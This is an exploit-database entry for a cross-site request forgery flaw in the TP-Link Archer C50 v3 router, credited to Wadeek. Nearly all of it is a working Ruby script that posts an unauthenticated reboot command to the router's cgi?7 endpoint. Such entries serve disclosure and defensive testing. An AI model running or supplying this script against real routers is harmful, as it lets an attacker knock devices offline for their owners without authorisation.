TP-Link C50 Wireless Router 3 Remote Reboot Cross Site Request Forgery

2018.08.10
Credit: Wadeek
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot) # Date: 2018-08-09 # Exploit Author: Wadeek # Vendor Homepage: https://www.tp-link.com/ # Hardware Version: Archer C50 v3 00000001 # Firmware Link: https://www.tp-link.com/download/Archer-C50_V3.html#Firmware # Firmware Version: <= Build 171227 #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! url = "http://192.168.0.1:80/" #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! require('mechanize') agent = Mechanize.new() def reboot(agent, url, path, query) begin response = agent.post(url+path, query, { "User-Agent" => "", "Accept" => "*/*", "Referer" => "http://192.168.0.1/mainFrame.htm", "Content-Type" => "text/plain", "Connection" => "keep-alive", "Cookie" => "" }) rescue Exception => e begin puts(e.inspect()) puts(e.page().body()) rescue end puts("") else puts(path) puts(response.body()) puts("") end end #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! reboot(agent, url, "cgi?7", "[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n") #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top